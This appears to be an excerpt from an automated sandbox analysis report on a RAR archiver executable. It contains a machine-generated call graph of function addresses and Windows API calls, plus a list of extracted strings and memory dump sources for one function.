39118->39120 39119->39053 39120->39114 39121->39119 39151 7ff6faa3ca6c 48 API calls 2 library calls 39121->39151 39123 7ff6faa6801f 39152 7ff6faa3cda4 10 API calls 2 library calls 39123->39152 39125 7ff6faa68027 39153 7ff6faa3ca40 61 API calls _CxxThrowException 39125->39153 39127->39043 39129 7ff6faa39e46 39128->39129 39134 7ff6faa39e6e memcpy_s 39128->39134 39130 7ff6faa69ce4 8 API calls 39129->39130 39131 7ff6faa39e5e 39130->39131 39135 7ff6faa69b70 8 API calls 39131->39135 39132 7ff6faa39e85 39133 7ff6faa69ce4 8 API calls 39132->39133 39136 7ff6faa39f97 39133->39136 39134->39132 39137 7ff6faa69ce4 8 API calls 39134->39137 39135->39134 39138 7ff6faa69b70 8 API calls 39136->39138 39137->39132 39139 7ff6faa39fa8 memcpy_s 39138->39139 39139->39139 39141 7ff6faa69ce4 8 API calls 39139->39141 39143 7ff6faa39fb4 39139->39143 39140 7ff6faa69ce4 8 API calls 39142 7ff6faa3a0bb 39140->39142 39141->39143 39144 7ff6faa69b70 8 API calls 39142->39144 39143->39140 39145 7ff6faa3a0c9 39144->39145 39146 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39145->39146 39147 7ff6faa3a0d8 39146->39147 39147->39108 39148->39101 39149->39098 39150->39103 39151->39123 39152->39125 39153->39119 39154->38934 39156->38935 39158->38954 39159->38956 39162->38744 39163 7ff6faa89c74 39164 7ff6faa89c7c 39163->39164 39165 7ff6faa89cac 39164->39165 39166 7ff6faa89cbb 39164->39166 39184 7ff6faa84f3c 15 API calls setbuf 39165->39184 39167 7ff6faa89cc5 39166->39167 39185 7ff6faa8ce08 32 API calls 2 library calls 39166->39185 39172 7ff6faa84b8c 39167->39172 39171 7ff6faa89cb1 memcpy_s 39173 7ff6faa84bab 39172->39173 39174 7ff6faa84ba1 39172->39174 39176 7ff6faa84bb0 39173->39176 39182 7ff6faa84bb7 __vcrt_getptd_noexit 39173->39182 39175 7ff6faa84ab4 setbuf 16 API calls 39174->39175 39181 7ff6faa84ba9 39175->39181 39178 7ff6faa84a74 __free_lconv_mon 15 API calls 39176->39178 39177 7ff6faa84bf6 39186 7ff6faa84f3c 15 API calls setbuf 39177->39186 39178->39181 39179 7ff6faa84be0 RtlReAllocateHeap 39179->39181 39179->39182 39181->39171 39182->39177 39182->39179 39183 7ff6faa836c0 new 2 API calls 39182->39183 39183->39182 39184->39171 39185->39167 39186->39181 39187 7ff6faa282f0 39188 7ff6faa28306 39187->39188 39200 7ff6faa2836f 39187->39200 39189 7ff6faa28324 39188->39189 39192 7ff6faa28371 39188->39192 39188->39200 39215 7ff6faa42414 61 API calls 39189->39215 39191 7ff6faa28347 39216 7ff6faa41998 138 API calls 39191->39216 39192->39200 39224 7ff6faa41998 138 API calls 39192->39224 39195 7ff6faa2835e 39217 7ff6faa418ac 39195->39217 39198 7ff6faa2b540 147 API calls 39199 7ff6faa2854f 39198->39199 39201 7ff6faa28578 39199->39201 39203 7ff6faa2b540 147 API calls 39199->39203 39210 7ff6faa2a410 39200->39210 39202 7ff6faa2b540 147 API calls 39201->39202 39207 7ff6faa2858f 39202->39207 39203->39201 39204 7ff6faa28634 39205 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39204->39205 39206 7ff6faa28663 39205->39206 39207->39204 39225 7ff6faa29628 175 API calls 39207->39225 39226 7ff6faa57a68 39210->39226 39213 7ff6faa2853a 39213->39198 39215->39191 39216->39195 39218 7ff6faa418ca 39217->39218 39219 7ff6faa418db 39217->39219 39218->39219 39220 7ff6faa418d6 39218->39220 39221 7ff6faa418de 39218->39221 39219->39200 39246 7ff6faa41c24 39220->39246 39251 7ff6faa41930 39221->39251 39224->39200 39225->39204 39227 7ff6faa2a434 39226->39227 39229 7ff6faa57a8d 39226->39229 39227->39213 39234 7ff6faa422e0 39227->39234 39228 7ff6faa57aaf 39228->39227 39231 7ff6faa422e0 12 API calls 39228->39231 39229->39228 39239 7ff6faa57340 157 API calls 39229->39239 39232 7ff6faa57adf 39231->39232 39233 7ff6faa42440 12 API calls 39232->39233 39233->39227 39240 7ff6faa420b4 39234->39240 39237 7ff6faa42307 39237->39213 39239->39228 39241 7ff6faa42130 39240->39241 39244 7ff6faa420d0 39240->39244 39241->39237 39245 7ff6faa3cd00 10 API calls 39241->39245 39242 7ff6faa42102 SetFilePointer 39242->39241 39243 7ff6faa42126 GetLastError 39242->39243 39243->39241 39244->39242 39247 7ff6faa41c37 39246->39247 39248 7ff6faa41c3b 39246->39248 39247->39219 39248->39247 39249 7ff6faa41c5d 39248->39249 39257 7ff6faa42d6c 12 API calls 2 library calls 39249->39257 39252 7ff6faa41964 39251->39252 39253 7ff6faa4194c 39251->39253 39254 7ff6faa41988 39252->39254 39258 7ff6faa3c9d0 10 API calls 39252->39258 39253->39252 39255 7ff6faa41958 CloseHandle 39253->39255 39254->39219 39255->39252 39257->39247 39258->39254 39259 7ff6faa6a924 39260 7ff6faa6a949 sprintf 39259->39260 39261 7ff6faa6a97f CompareStringA 39260->39261 39262 7ff6faa23e71 39263 7ff6faa23e89 39262->39263 39264 7ff6faa23e81 39262->39264 39266 7ff6faa23edd 39263->39266 39267 7ff6faa23ea3 39263->39267 39264->39263 39273 7ff6faa79a14 49 API calls 39264->39273 39269 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39266->39269 39274 7ff6faa4331c 48 API calls 2 library calls 39267->39274 39271 7ff6faa23eef 39269->39271 39270 7ff6faa23eab 39270->39266 39275 7ff6faa263e8 8 API calls 2 library calls 39270->39275 39273->39263 39274->39270 39275->39266 39276 7ff6faa6bb70 39279 7ff6faa6bb80 39276->39279 39288 7ff6faa6bae8 39279->39288 39281 7ff6faa6bb79 39282 7ff6faa6bb97 39282->39281 39293 7ff6faa31690 39282->39293 39284 7ff6faa6bbc8 SetEvent 39285 7ff6faa6bbd5 LeaveCriticalSection 39284->39285 39286 7ff6faa6bae8 67 API calls 39285->39286 39286->39282 39297 7ff6faa6b974 WaitForSingleObject 39288->39297 39291 7ff6faa6bb16 EnterCriticalSection LeaveCriticalSection 39292 7ff6faa6bb12 39291->39292 39292->39282 39294 7ff6faa316a4 39293->39294 39295 7ff6faa316c2 EnterCriticalSection 39293->39295 39294->39295 39305 7ff6faa31180 39294->39305 39295->39284 39295->39285 39298 7ff6faa6b986 GetLastError 39297->39298 39299 7ff6faa6b9b7 39297->39299 39303 7ff6faa3ca6c 48 API calls 2 library calls 39298->39303 39299->39291 39299->39292 39301 7ff6faa6b9a6 39304 7ff6faa3ca40 61 API calls _CxxThrowException 39301->39304 39303->39301 39304->39299 39306 7ff6faa311ab 39305->39306 39311 7ff6faa311b0 39305->39311 39315 7ff6faa317c8 216 API calls 2 library calls 39306->39315 39308 7ff6faa3166a 39308->39294 39309 7ff6faa56d38 216 API calls 39309->39311 39310 7ff6faa31080 48 API calls 39310->39311 39311->39308 39311->39309 39311->39310 39312 7ff6faa56e90 216 API calls 39311->39312 39314 7ff6faa56fe8 216 API calls 39311->39314 39316 7ff6faa317c8 216 API calls 2 library calls 39311->39316 39312->39311 39314->39311 39315->39311 39316->39311 39317 7ff6faa23b53 39318 7ff6faa23b64 39317->39318 39368 7ff6faa41e80 39318->39368 39319 7ff6faa23c09 39380 7ff6faa423f0 39319->39380 39321 7ff6faa23c18 39385 7ff6faa28050 157 API calls 39321->39385 39322 7ff6faa23bb6 39322->39319 39322->39321 39323 7ff6faa23c01 39322->39323 39325 7ff6faa41c24 12 API calls 39323->39325 39325->39319 39326 7ff6faa23c3d 39386 7ff6faa28010 13 API calls 39326->39386 39327 7ff6faa23ccc 39349 7ff6faa23c90 39327->39349 39393 7ff6faa42414 61 API calls 39327->39393 39330 7ff6faa23c45 39333 7ff6faa23c54 39330->39333 39387 7ff6faa3cba8 75 API calls 39330->39387 39332 7ff6faa23cf9 39394 7ff6faa41998 138 API calls 39332->39394 39388 7ff6faa2a9d4 186 API calls wcschr 39333->39388 39337 7ff6faa23c5c 39389 7ff6faa293ac 8 API calls 39337->39389 39338 7ff6faa23d10 39340 7ff6faa418ac 15 API calls 39338->39340 39340->39349 39341 7ff6faa23c66 39343 7ff6faa23c77 39341->39343 39390 7ff6faa3ca40 61 API calls _CxxThrowException 39341->39390 39391 7ff6faa28090 8 API calls 39343->39391 39346 7ff6faa23c7f 39346->39349 39392 7ff6faa3ca40 61 API calls _CxxThrowException 39346->39392 39395 7ff6faa6d400 48 API calls 39349->39395 39369 7ff6faa41e95 setbuf 39368->39369 39370 7ff6faa41ecb CreateFileW 39369->39370 39371 7ff6faa41f59 GetLastError 39370->39371 39372 7ff6faa41fb8 39370->39372 39396 7ff6faa54534 39371->39396 39374 7ff6faa41ff7 39372->39374 39375 7ff6faa41fd9 SetFileTime 39372->39375 39377 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39374->39377 39375->39374 39379 7ff6faa4203a 39377->39379 39378 7ff6faa41f78 CreateFileW GetLastError 39378->39372 39379->39322 39411 7ff6faa424e8 39380->39411 39383 7ff6faa4240e 39383->39327 39385->39326 39386->39330 39388->39337 39389->39341 39390->39343 39391->39346 39392->39349 39393->39332 39394->39338 39397 7ff6faa54549 setbuf 39396->39397 39407 7ff6faa545a2 39397->39407 39408 7ff6faa5472c CharUpperW 39397->39408 39399 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39401 7ff6faa41f74 39399->39401 39400 7ff6faa54579 39409 7ff6faa54760 CharUpperW 39400->39409 39401->39372 39401->39378 39403 7ff6faa54592 39404 7ff6faa5459a 39403->39404 39405 7ff6faa54629 GetCurrentDirectoryW 39403->39405 39410 7ff6faa5472c CharUpperW 39404->39410 39405->39407 39407->39399 39408->39400 39409->39403 39410->39407 39417 7ff6faa41af0 39411->39417 39414 7ff6faa423f9 39414->39383 39416 7ff6faa3ca40 61 API calls _CxxThrowException 39414->39416 39416->39383 39418 7ff6faa41b01 setbuf 39417->39418 39419 7ff6faa41b6f CreateFileW 39418->39419 39420 7ff6faa41b68 39418->39420 39419->39420 39421 7ff6faa54534 10 API calls 39420->39421 39422 7ff6faa41be1 39420->39422 39423 7ff6faa41bb3 39421->39423 39424 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39422->39424 39423->39422 39425 7ff6faa41bb7 CreateFileW 39423->39425 39426 7ff6faa41c14 39424->39426 39425->39422 39426->39414 39427 7ff6faa3ca08 10 API calls 39426->39427 39427->39414 39428 7ff6faa21884 39560 7ff6faa534e4 39428->39560 39431 7ff6faa21926 39433 7ff6faa2195b 39431->39433 39624 7ff6faa53f98 63 API calls 2 library calls 39431->39624 39432 7ff6faa534e4 CompareStringW 39434 7ff6faa218a6 39432->39434 39441 7ff6faa21970 39433->39441 39625 7ff6faa42ed8 100 API calls 3 library calls 39433->39625 39435 7ff6faa534e4 CompareStringW 39434->39435 39440 7ff6faa218b9 39434->39440 39435->39440 39439 7ff6faa21915 39623 7ff6faa3ca40 61 API calls _CxxThrowException 39439->39623 39440->39431 39622 7ff6faa21168 8 API calls 2 library calls 39440->39622 39443 7ff6faa219b8 39441->39443 39626 7ff6faa649f4 48 API calls 39441->39626 39564 7ff6faa25450 39443->39564 39445 7ff6faa219b0 39627 7ff6faa38444 54 API calls fflush 39445->39627 39451 7ff6faa272c4 76 API calls 39458 7ff6faa21a12 39451->39458 39452 7ff6faa21ae6 39598 7ff6faa27514 39452->39598 39453 7ff6faa21b04 39602 7ff6faa36c94 39453->39602 39456 7ff6faa21af2 39457 7ff6faa27514 72 API calls 39456->39457 39459 7ff6faa21aff 39457->39459 39458->39452 39458->39453 39461 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39459->39461 39460 7ff6faa21b13 39618 7ff6faa27148 39460->39618 39462 7ff6faa22f97 39461->39462 39464 7ff6faa21c71 39465 7ff6faa21ca7 39464->39465 39466 7ff6faa263e8 8 API calls 39464->39466 39467 7ff6faa21cd5 39465->39467 39468 7ff6faa21ce4 39465->39468 39469 7ff6faa21c91 39466->39469 39470 7ff6faa7a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39467->39470 39471 7ff6faa7a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39468->39471 39472 7ff6faa249b8 99 API calls 39469->39472 39476 7ff6faa21cee 39470->39476 39471->39476 39473 7ff6faa21c9d 39472->39473 39474 7ff6faa263e8 8 API calls 39473->39474 39474->39465 39475 7ff6faa21d50 39478 7ff6faa7a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39475->39478 39476->39475 39477 7ff6faa6de30 72 API calls 39476->39477 39477->39475 39479 7ff6faa21d62 39478->39479 39480 7ff6faa6dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39479->39480 39481 7ff6faa21d7b 39479->39481 39480->39481 39482 7ff6faa72bcc 66 API calls 39481->39482 39483 7ff6faa21dba 39482->39483 39556 7ff6faa4ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39483->39556 39484 7ff6faa21e1c 39486 7ff6faa210c0 8 API calls 39484->39486 39488 7ff6faa21e5d 39484->39488 39485 7ff6faa21dde std::bad_alloc::bad_alloc 39485->39484 39487 7ff6faa7ba34 _CxxThrowException RtlPcToFileHeader RaiseException 39485->39487 39486->39488 39487->39484 39489 7ff6faa2a410 159 API calls 39488->39489 39554 7ff6faa21ef4 39488->39554 39489->39554 39490 7ff6faa22d0c 39492 7ff6faa6de30 72 API calls 39490->39492 39501 7ff6faa22d21 39490->39501 39491 7ff6faa22ccc 39491->39490 39555 7ff6faa48c80 72 API calls 39491->39555 39492->39501 39493 7ff6faa46688 48 API calls 39493->39554 39494 7ff6faa22d86 39498 7ff6faa649f4 48 API calls 39494->39498 39536 7ff6faa22dd0 39494->39536 39495 7ff6faa649f4 48 API calls 39526 7ff6faa22005 39495->39526 39496 7ff6faa6b6d0 73 API calls 39496->39526 39497 7ff6faa25e70 169 API calls 39497->39526 39504 7ff6faa22d9e 39498->39504 39499 7ff6faa2a504 208 API calls 39499->39536 39500 7ff6faa280e4 192 API calls 39500->39536 39501->39494 39502 7ff6faa649f4 48 API calls 39501->39502 39505 7ff6faa22d6c 39502->39505 39503 7ff6faa25928 237 API calls 39503->39526 39506 7ff6faa38444 54 API calls 39504->39506 39508 7ff6faa649f4 48 API calls 39505->39508 39509 7ff6faa22da6 39506->39509 39507 7ff6faa47c7c 127 API calls 39507->39536 39511 7ff6faa22d79 39508->39511 39517 7ff6faa41c24 12 API calls 39509->39517 39510 7ff6faa2b540 147 API calls 39510->39554 39515 7ff6faa38444 54 API calls 39511->39515 39512 7ff6faa2e6c8 157 API calls 39512->39554 39513 7ff6faa3e21c 63 API calls 39513->39526 39514 7ff6faa21168 8 API calls 39514->39536 39515->39494 39516 7ff6faa2a410 159 API calls 39516->39554 39517->39536 39518 7ff6faa465b4 48 API calls 39518->39554 39519 7ff6faa6ae50 71 API calls 39523 7ff6faa22e39 39519->39523 39520 7ff6faa44554 16 API calls 39520->39554 39521 7ff6faa41998 138 API calls 39521->39554 39522 7ff6faa233b4 64 API calls 39522->39536 39523->39519 39525 7ff6faa3ca40 61 API calls 39523->39525 39523->39536 39524 7ff6faa25db4 46 API calls 39524->39554 39525->39536 39526->39495 39526->39496 39526->39497 39526->39503 39526->39513 39529 7ff6faa2b540 147 API calls 39526->39529 39553 7ff6faa38444 54 API calls 39526->39553 39526->39554 39527 7ff6faa26188 231 API calls 39527->39536 39528 7ff6faa23f74 138 API calls 39528->39536 39529->39526 39530 7ff6faa47c7c 127 API calls 39530->39554 39531 7ff6faa41930 11 API calls 39531->39554 39532 7ff6faa2571c 12 API calls 39532->39554 39533 7ff6faa5ba9c 195 API calls 39533->39536 39534 7ff6faa649f4 48 API calls 39534->39536 39535 7ff6faa25004 49 API calls 39535->39554 39536->39499 39536->39500 39536->39507 39536->39514 39536->39522 39536->39523 39536->39527 39536->39528 39536->39533 39536->39534 39538 7ff6faa38444 54 API calls 39536->39538 39537 7ff6faa41e80 15 API calls 39537->39554 39538->39536 39539 7ff6faa2a4d0 12 API calls 39539->39554 39540 7ff6faa418ac 15 API calls 39540->39554 39541 7ff6faa21168 8 API calls 39541->39554 39542 7ff6faa6d48c 58 API calls 39542->39554 39543 7ff6faa25e70 169 API calls 39543->39554 39544 7ff6faa6c0a8 10 API calls 39544->39554 39545 7ff6faa39be0 14 API calls 39545->39554 39546 7ff6faa46378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39546->39554 39547 7ff6faa597f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39547->39554 39548 7ff6faa3cbd0 75 API calls 39548->39554 39549 7ff6faa45c0c 237 API calls 39549->39554 39550 7ff6faa45d40 237 API calls 39550->39554 39551 7ff6faa26114 216 API calls 39551->39554 39552 7ff6faa45708 237 API calls 39552->39554 39553->39526 39554->39491 39554->39493 39554->39510 39554->39512 39554->39516 39554->39518 39554->39520 39554->39521 39554->39524 39554->39526 39554->39530 39554->39531 39554->39532 39554->39535 39554->39537 39554->39539 39554->39540 39554->39541 39554->39542 39554->39543 39554->39544 39554->39545 39554->39546 39554->39547 39554->39548 39554->39549 39554->39550 39554->39551 39554->39552 39557 7ff6faa4a250 237 API calls 39554->39557 39558 7ff6faa30d60 237 API calls 39554->39558 39559 7ff6faa4aae0 237 API calls 39554->39559 39555->39490 39556->39485 39557->39554 39558->39526 39559->39526 39561 7ff6faa534f6 39560->39561 39562 7ff6faa21893 39561->39562 39628 7ff6faa6dac0 CompareStringW 39561->39628 39562->39432 39562->39440 39565 7ff6faa2546f setbuf 39564->39565 39566 7ff6faa2554a memcpy_s 39565->39566 39582 7ff6faa25588 memcpy_s 39565->39582 39569 7ff6faa6c0a8 10 API calls 39566->39569 39568 7ff6faa25583 39658 7ff6faa26eb8 39568->39658 39570 7ff6faa25576 39569->39570 39573 7ff6faa2681c 54 API calls 39570->39573 39573->39568 39574 7ff6faa256e9 39665 7ff6faa66f68 39574->39665 39576 7ff6faa256f6 39577 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39576->39577 39578 7ff6faa219df 39577->39578 39584 7ff6faa272c4 39578->39584 39582->39568 39629 7ff6faa23210 39582->39629 39635 7ff6faa37088 39582->39635 39639 7ff6faa2681c 39582->39639 39650 7ff6faa67a24 39582->39650 39669 7ff6faa2571c 39582->39669 39677 7ff6faa34380 14 API calls 39582->39677 39585 7ff6faa272eb 39584->39585 39772 7ff6faa388dc 39585->39772 39587 7ff6faa27302 39776 7ff6faa5915c 39587->39776 39589 7ff6faa2730f 39788 7ff6faa57044 39589->39788 39592 7ff6faa7a444 new 4 API calls 39593 7ff6faa273e3 39592->39593 39595 7ff6faa273f5 memcpy_s 39593->39595 39793 7ff6faa4894c 39593->39793 39596 7ff6faa39be0 14 API calls 39595->39596 39597 7ff6faa21a01 39596->39597 39597->39451 39599 7ff6faa27539 39598->39599 39819 7ff6faa5922c 39599->39819 39603 7ff6faa36cbc 39602->39603 39604 7ff6faa36d45 39602->39604 39606 7ff6faa36cd9 39603->39606 39830 7ff6faa59f78 8 API calls 2 library calls 39603->39830 39605 7ff6faa36d83 39604->39605 39607 7ff6faa36d69 39604->39607 39835 7ff6faa59f78 8 API calls 2 library calls 39604->39835 39605->39460 39609 7ff6faa36cf3 39606->39609 39831 7ff6faa59f78 8 API calls 2 library calls 39606->39831 39607->39605 39836 7ff6faa59f78 8 API calls 2 library calls 39607->39836 39612 7ff6faa36d0d 39609->39612 39832 7ff6faa59f78 8 API calls 2 library calls 39609->39832 39615 7ff6faa36d2b 39612->39615 39833 7ff6faa59f78 8 API calls 2 library calls 39612->39833 39615->39605 39834 7ff6faa59f78 8 API calls 2 library calls 39615->39834 39619 7ff6faa27167 39618->39619 39620 7ff6faa27162 39618->39620 39837 7ff6faa26c64 130 API calls _UnwindNestedFrames 39620->39837 39622->39439 39623->39431 39624->39433 39625->39441 39626->39445 39627->39443 39628->39562 39630 7ff6faa232e9 39629->39630 39631 7ff6faa23231 39629->39631 39630->39582 39631->39630 39678 7ff6faa34380 14 API calls 39631->39678 39633 7ff6faa2329c 39633->39630 39679 7ff6faa42a20 22 API calls 2 library calls 39633->39679 39636 7ff6faa370a4 39635->39636 39637 7ff6faa370c5 39636->39637 39680 7ff6faa48558 10 API calls 2 library calls 39636->39680 39637->39582 39681 7ff6faa26714 39639->39681 39641 7ff6faa26836 39642 7ff6faa26853 39641->39642 39692 7ff6faa848c0 31 API calls _invalid_parameter_noinfo 39641->39692 39642->39582 39644 7ff6faa2684b 39644->39642 39645 7ff6faa268a9 std::bad_alloc::bad_alloc 39644->39645 39693 7ff6faa7ba34 RtlPcToFileHeader RaiseException 39645->39693 39647 7ff6faa268c4 39694 7ff6faa27188 12 API calls 39647->39694 39649 7ff6faa268eb 39649->39582 39651 7ff6faa67a4f 39650->39651 39656 7ff6faa67a59 39650->39656 39651->39582 39652 7ff6faa67a7c 39731 7ff6faa6b6d0 73 API calls _Init_thread_footer 39652->39731 39655 7ff6faa67b1c 60 API calls 39655->39656 39656->39651 39656->39652 39656->39655 39699 7ff6faa671fc 39656->39699 39732 7ff6faa341b0 14 API calls 2 library calls 39656->39732 39659 7ff6faa26ee6 39658->39659 39664 7ff6faa26f5c 39658->39664 39765 7ff6faa69f64 8 API calls memcpy_s 39659->39765 39661 7ff6faa26efb 39662 7ff6faa26f2f 39661->39662 39661->39664 39662->39661 39766 7ff6faa27188 12 API calls 39662->39766 39664->39574 39666 7ff6faa66fb4 39665->39666 39667 7ff6faa66f8a 39665->39667 39667->39666 39668 7ff6faa44538 FindClose 39667->39668 39668->39667 39670 7ff6faa25742 39669->39670 39676 7ff6faa2575d 39669->39676 39670->39676 39771 7ff6faa53520 12 API calls 2 library calls 39670->39771 39674 7ff6faa257fc 39674->39582 39675 7ff6faa548bc 8 API calls 39675->39674 39767 7ff6faa53610 39676->39767 39677->39582 39678->39633 39679->39630 39680->39636 39682 7ff6faa26738 39681->39682 39691 7ff6faa267a7 memcpy_s 39681->39691 39683 7ff6faa26765 39682->39683 39695 7ff6faa3ca6c 48 API calls 2 library calls 39682->39695 39686 7ff6faa267e1 39683->39686 39687 7ff6faa26786 39683->39687 39685 7ff6faa26759 39696 7ff6faa3cb64 8 API calls 39685->39696 39686->39691 39698 7ff6faa3cb64 8 API calls 39686->39698 39687->39691 39697 7ff6faa3cb64 8 API calls 39687->39697 39691->39641 39692->39644 39693->39647 39694->39649 39695->39685 39704 7ff6faa67217 setbuf 39699->39704 39700 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39702 7ff6faa6776f 39700->39702 39702->39656 39714 7ff6faa6729c 39704->39714 39722 7ff6faa6725a 39704->39722 39725 7ff6faa673c5 39704->39725 39740 7ff6faa44554 39704->39740 39705 7ff6faa67453 39707 7ff6faa67476 39705->39707 39708 7ff6faa67464 39705->39708 39727 7ff6faa67496 39707->39727 39737 7ff6faa44538 39707->39737 39748 7ff6faa67c38 55 API calls 3 library calls 39708->39748 39710 7ff6faa67471 39710->39707 39713 7ff6faa67342 39713->39722 39726 7ff6faa67656 39713->39726 39730 7ff6faa676ef 39713->39730 39749 7ff6faa34380 14 API calls 39713->39749 39716 7ff6faa673bb 39714->39716 39718 7ff6faa6732e 39714->39718 39717 7ff6faa7a444 new 4 API calls 39716->39717 39717->39725 39718->39713 39719 7ff6faa6734a 39718->39719 39721 7ff6faa6737e 39719->39721 39719->39722 39746 7ff6faa34380 14 API calls 39719->39746 39720 7ff6faa44554 16 API calls 39720->39722 39721->39722 39747 7ff6faa3cbd0 75 API calls 39721->39747 39722->39700 39733 7ff6faa445cc 39725->39733 39726->39722 39726->39726 39728 7ff6faa67723 39726->39728 39726->39730 39727->39720 39727->39722 39750 7ff6faa2c214 8 API calls 2 library calls 39728->39750 39730->39722 39751 7ff6faa48558 10 API calls 2 library calls 39730->39751 39732->39656 39735 7ff6faa445ed 39733->39735 39734 7ff6faa446ec 15 API calls 39734->39735 39735->39734 39736 7ff6faa446b2 39735->39736 39736->39705 39736->39713 39738 7ff6faa44549 FindClose 39737->39738 39739 7ff6faa4454f 39737->39739 39738->39739 39739->39727 39741 7ff6faa44570 39740->39741 39742 7ff6faa44574 39741->39742 39752 7ff6faa446ec 39741->39752 39742->39714 39745 7ff6faa4458d FindClose 39745->39742 39746->39721 39747->39722 39748->39710 39749->39726 39750->39722 39751->39722 39753 7ff6faa44705 setbuf 39752->39753 39754 7ff6faa447a4 FindNextFileW 39753->39754 39755 7ff6faa44733 FindFirstFileW 39753->39755 39757 7ff6faa447ae GetLastError 39754->39757 39764 7ff6faa4478b 39754->39764 39756 7ff6faa44749 39755->39756 39755->39764 39758 7ff6faa54534 10 API calls 39756->39758 39757->39764 39759 7ff6faa4475b 39758->39759 39761 7ff6faa4477a GetLastError 39759->39761 39762 7ff6faa4475f FindFirstFileW 39759->39762 39760 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39763 7ff6faa44587 39760->39763 39761->39764 39762->39761 39762->39764 39763->39742 39763->39745 39764->39760 39765->39661 39766->39662 39770 7ff6faa53626 setbuf wcschr 39767->39770 39768 7ff6faa7a610 _UnwindNestedFrames 8 API calls 39769 7ff6faa257e1 39768->39769 39769->39674 39769->39675 39770->39768 39771->39676 39773 7ff6faa38919 39772->39773 39798 7ff6faa64b14 39773->39798 39775 7ff6faa38954 memcpy_s 39775->39587 39777 7ff6faa59199 39776->39777 39778 7ff6faa7a480 4 API calls 39777->39778 39779 7ff6faa591be 39778->39779 39780 7ff6faa7a444 new 4 API calls 39779->39780 39781 7ff6faa591cf 39780->39781 39782 7ff6faa591e1 39781->39782 39783 7ff6faa388dc 8 API calls 39781->39783 39784 7ff6faa7a444 new 4 API calls 39782->39784 39783->39782 39785 7ff6faa591f7 39784->39785 39786 7ff6faa59209 39785->39786 39787 7ff6faa388dc 8 API calls 39785->39787 39786->39589 39787->39786 39789 7ff6faa388dc 8 API calls 39788->39789 39790 7ff6faa57063 39789->39790 39791 7ff6faa572c0 4 API calls 39790->39791 39792 7ff6faa27325 39791->39792 39792->39592 39792->39595 39803 7ff6faa67d80 39793->39803 39799 7ff6faa64b2b 39798->39799 39800 7ff6faa64b26 39798->39800 39799->39775 39802 7ff6faa64b38 8 API calls _UnwindNestedFrames 39800->39802 39802->39799 39810 7ff6faa68094 39803->39810 39806 7ff6faa48a44 39807 7ff6faa48a5a memcpy_s 39806->39807 39814 7ff6faa6bac4 39807->39814 39811 7ff6faa6809f 39810->39811 39812 7ff6faa67ec8 68 API calls 39811->39812 39813 7ff6faa4896e 39812->39813 39813->39806 39817 7ff6faa6ba70 GetCurrentProcess GetProcessAffinityMask 39814->39817 39816 7ff6faa489c5 39816->39595 39818 7ff6faa6ba96 39817->39818 39818->39816 39818->39818 39821 7ff6faa59245 39819->39821 39827 7ff6faa46194 72 API calls 39821->39827 39822 7ff6faa592b1 39828 7ff6faa46194 72 API calls 39822->39828 39824 7ff6faa592bd 39829 7ff6faa46194 72 API calls 39824->39829 39826 7ff6faa592c9 39827->39822 39828->39824 39829->39826 39830->39606 39831->39609 39832->39612 39833->39615 39834->39604 39835->39607 39836->39605 39837->39619

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 00007FF6FAA354C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                • API String ID: 0-1628410872
